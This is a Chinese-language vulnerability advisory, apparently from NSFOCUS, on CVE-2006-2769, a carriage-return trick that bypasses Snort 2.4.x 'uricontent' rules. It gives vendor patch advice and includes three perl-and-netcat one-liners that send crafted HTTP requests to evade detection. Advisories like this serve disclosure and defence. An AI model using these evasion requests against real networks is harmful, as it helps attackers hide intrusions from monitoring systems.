安全研究
安全漏洞
Snort URIContent规则检测绕过漏洞
发布日期:2006-05-31
更新日期:2007-06-20
受影响系统:Snort Project Snort 2.4.0-2.4.4
描述:
BUGTRAQ ID:
18200
CVE(CAN) ID:
CVE-2006-2769
Snort是广泛部署的开放源码网络入侵检测系统(IDS)。
Snort 2.4.0-2.4.4 的HTTP Inspect处理程序(http_inspect)存在安全漏洞,远程攻击者通过在URL之后及HTTP声明之前加入回车,利用此漏洞可绕过 "uricontent" 规则。
<*来源:Blake Hartstein
链接:
http://xforce.iss.net/xforce/xfdb/26855
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
perl -e'print "GET /www.example.com?paramter=|backdoor\r http/1.0\r\n\r\n"'|nc vulnerable.server 80
perl -e 'print "GET \x90\x90\x0d http/1.0\r\n\r\n"'|nc 192.168.1.3 80
perl -e 'print "GET \x0d/index.php\x90\x90 HTTP/1.0\n\r\n"'|nc 192.168.1.3 80
建议:
厂商补丁:
Snort Project
-------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.snort.org/浏览次数:2008
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
